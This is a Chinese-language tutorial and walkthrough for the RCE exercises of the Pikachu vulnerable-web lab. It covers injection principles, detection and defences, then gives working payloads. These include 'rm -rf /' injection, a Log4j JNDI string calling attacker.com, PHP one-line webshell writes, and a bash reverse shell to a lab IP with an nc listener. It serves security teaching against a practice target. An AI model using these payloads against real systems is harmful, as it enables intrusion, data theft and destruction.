Pikachu靶场-RCE漏洞
1. RCE漏洞原理
- 核心问题:应用程序未对用户输入进行严格过滤,直接将输入内容拼接至系统命令、代码执行函数或反序列化过程中。
- 常见触发场景:
- 命令注入:用户输入被拼接到操作系统命令(如system()、exec())。
- 代码注入:动态执行用户可控的代码(如eval()、Function())。
- 反序列化漏洞:反序列化未经验证的数据触发恶意代码(如Java的ObjectInputStream、Python的pickle)。
2. RCE漏洞类型
(1) 命令注入(Command Injection)
- 触发点:直接调用系统命令的函数(如bash、cmd)。
- 示例:
// PHP代码示例:未过滤用户输入的id参数
$id = $_GET['id'];
system("ping -c 4 " . $id); - 攻击者可输入127.0.0.1; rm -rf /,导致删除服务器文件。
(2) 反序列化漏洞
- 触发点:反序列化不可信数据时自动调用危险方法(如Java的readObject())。
- 示例:Apache Log4j2(CVE-2021-44228)通过日志记录中的${jndi:ldap://恶意URL}触发远程代码加载。
(3) 动态代码执行
- 触发点:使用eval()、setTimeout()等动态执行代码。
- 示例:
// Node.js代码示例:未过滤用户输入
const userInput = req.query.input;
eval('console.log("' + userInput + '")'); - 输入"); process.exit(1); // 可导致服务崩溃。
3. 典型攻击场景
- Web应用:通过URL参数、HTTP头、表单字段注入恶意命令。
- 中间件/框架:利用Struts2、Spring、Fastjson等框架的漏洞(如CVE-2017-5638)。
- IoT设备:通过未授权接口执行系统命令(如路由器固件漏洞)。
- 供应链攻击:污染开源库(如PyPI、npm包)间接引入RCE。
4. RCE漏洞危害
- 完全控制系统:获取服务器Shell权限,植入后门或勒索软件。
- 数据泄露:窃取数据库、配置文件中的敏感信息。
- 横向渗透:作为跳板攻击内网其他设备。
- 资源滥用:利用服务器进行挖矿、DDoS攻击。
5. 检测方法
(1) 黑盒测试
- 模糊测试(Fuzzing):输入|、;、&、$(cmd)等特殊字符,观察响应异常。
- 工具扫描:使用Burp Suite、Nuclei、Metasploit检测已知RCE漏洞。
(2) 白盒审计
- 代码审计:检查以下高危函数:
- PHP:system(), exec(), popen(), eval().
- Python:os.system(), subprocess.run(), pickle.loads().
- Java:Runtime.exec(), ProcessBuilder(), ObjectInputStream.
- 反序列化检查:验证反序列化数据是否签名或加密。
6. 防御措施
(1) 输入过滤与验证
- 白名单机制:仅允许预期字符(如数字、字母)。
- 转义危险字符:过滤|、&、;、$()等Shell元字符。
(2) 避免直接执行命令
- 使用安全的API替代系统命令。例如:
- 用FileUtils.readFileToString()代替Runtime.exec("cat /etc/passwd")。
(3) 最小权限原则
- Web服务以低权限用户(如www-data)运行,限制命令执行能力。
(4) 禁用危险函数
- 在PHP中禁用eval()、system()等函数(修改php.ini的disable_functions)。
(5) 安全反序列化
- 避免反序列化不可信数据,使用JSON等安全格式替代。
- Java中可启用SerializationFilter(JDK 17+)。
7. 经典案例
- Shellshock(CVE-2014-6271)
- 漏洞原因:Bash解析环境变量时执行恶意代码。
- 攻击载荷:() { :; }; /bin/bash -c '恶意命令'
- Fastjson RCE(CVE-2022-25845)
- 漏洞原因:反序列化时自动加载恶意类。
- 修复方案:升级至1.2.83+版本并启用safeMode。
- Log4j2(CVE-2021-44228)
- 漏洞原因:日志记录中未过滤JNDI lookup。
- 攻击载荷:${jndi:ldap://attacker.com/Exploit}
总结
RCE漏洞的根源在于“信任了不可信的输入”。防御需结合输入过滤、最小权限、代码审计等多层机制,同时及时更新依赖库和框架补丁。对于企业,建议定期进行渗透测试,并建立应急响应流程以快速应对此类高危漏洞。
一,exec "ping
1,提供了一个允许执行ping操作的网站
尝试执行系统命令
127.0.0.1;ls
127.0.0.1 | ls
127.0.0.1 & ls
127.0.0.1 || ls
127.0.0.1 && ls
2,可以看到以上字符除了||都能进行注入,直接写一句话木马到当前文件夹
127.0.0.1;echo "<?php @eval($_POST['attack']);?>" >webshell.php
127.0.0.1;chmod 777 webshell.php
127.0.0.1;ls -la
然后使用蚁剑连接webshell.php
二,exec "eval"
漏洞位置
if(isset($_POST['submit']) && $_POST['txt'] != null){
if(@!eval($_POST['txt'])){
$html.="<p>你喜欢的字符还挺奇怪的!</p>";
}
}
关键危险函数:eval($_POST['txt'])
漏洞原理
- 直接执行用户输入
用户通过POST提交的txt参数未经任何过滤,直接传递给eval()函数执行。
eval()会将字符串解析为PHP代码执行,攻击者可构造恶意代码注入。 - 缺乏输入过滤
未对$_POST['txt']进行以下安全处理:
- 过滤危险字符(如;、$、{、})
- 白名单验证(仅允许特定字符)
- 代码语法检查
- 错误抑制符(@)的误导
@符号抑制了错误输出,但无法阻止代码执行。即使代码执行失败,攻击者仍可能通过盲注(Blind RCE)探测漏洞。
漏洞危害
- 完全控制服务器:执行系统命令、读写文件、安装后门。
- 数据泄露:读取数据库配置、用户信息等敏感文件。
- 横向渗透:以当前服务器为跳板攻击内网。
- 持久化攻击:植入Webshell、定时任务、SSH密钥。
修复建议
- 禁用eval函数
在php.ini中禁用eval函数:
disable_functions = eval - 输入过滤机制
如果业务必须接受动态代码,需实现严格过滤:
// 示例:仅允许数字和字母
$input = $_POST['txt'];
if (!preg_match('/^[a-zA-Z0-9]+$/', $input)) {
die("非法输入!");
} - 使用安全替代方案
- 避免动态执行代码,改用预定义函数或API。
- 例如,若需数学计算,用intval()代替动态表达式。
- 最小权限运行
Web服务器(如Apache/Nginx)以低权限用户(如www-data)运行,限制其执行系统命令的能力。 - 日志监控
记录所有用户输入及异常行为,使用IDS/IPS检测攻击尝试。
一,漏洞验证(POC)
- 提交简单PHP代码测试:
txt=echo phpinfo();
若页面返回PHP配置信息,则漏洞存在。
- 盲注检测(无回显时):
txt=system('sleep 5');
观察响应是否延迟5秒。
二,攻击示例
攻击者可提交以下Payload实现任意代码执行:
// 执行系统命令(如查看文件列表)
txt=system('ls -la /');
// 写入Webshell
txt=file_put_contents('shell.php','<?php @eval($_POST["cmd"]);?>');
txt=system('ls');
// 靶机反弹Shell(URL栏需URL编码)
txt=exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.99.74/4444 0>&1'");
攻击机打开监听
nc -lvvp 4444
